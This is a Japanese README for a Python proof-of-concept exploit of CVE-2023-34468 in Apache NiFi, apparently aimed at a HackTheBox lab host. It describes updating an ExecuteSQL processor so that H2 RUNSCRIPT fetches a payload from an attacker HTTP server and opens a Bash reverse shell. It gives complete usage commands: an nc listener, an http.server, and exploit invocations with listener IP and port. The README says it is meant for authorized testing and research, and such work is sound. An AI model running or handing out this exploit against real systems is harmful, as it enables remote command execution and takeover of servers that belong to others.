
CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC
編集可能なApache NiFi ExecuteSQLプロセッサを悪用し、H2のRUNSCRIPTペイロードを使用してBashリバースシェル経由でリモートコマンド実行を誘発する、短いPythonのPoCです。
認可されたテストおよび研究目的のみに使用してください。所有していない、または明示的なテスト許可を得ていないシステムに対して使用しないでください。
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
--processor-idを受け付けます。rce.sqlペイロードを作成します。ncリスナーとHTTPサーバーを起動するよう促します。RUNSCRIPTを介してrce.sqlをフェッチするようにプロセッサクエリを更新します。



git clone https://github.com/ozcanpng/CVE-2023-34468.git
cd CVE-2023-34468
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
ターミナル1:
rlwrap nc -lvnp 4444
ターミナル2(このリポジトリのディレクトリから):
python3 -m http.server 8000
ターミナル3:
python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
手動でプロセッサを選択する場合:
python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444
| 製品 | 影響を受けるバージョン | 必要なアクセス権 | 影響 |
|---|---|---|---|
| Apache NiFi | 編集可能なExecuteSQL/H2動作を使用するCVE-2023-34468の影響を受けるデプロイメント | APIを介して対象のNiFiプロセッサに到達し変更する能力 | リモートコマンド実行 |
rce.sqlファイルはgitによって無視され、リポジトリディレクトリからpython3 -m http.serverで提供する必要があります。--processor-idを使用してプロセッサUUIDを手動で指定してください。ozcanpng — github.com/ozcanpng — ozcanpng.dev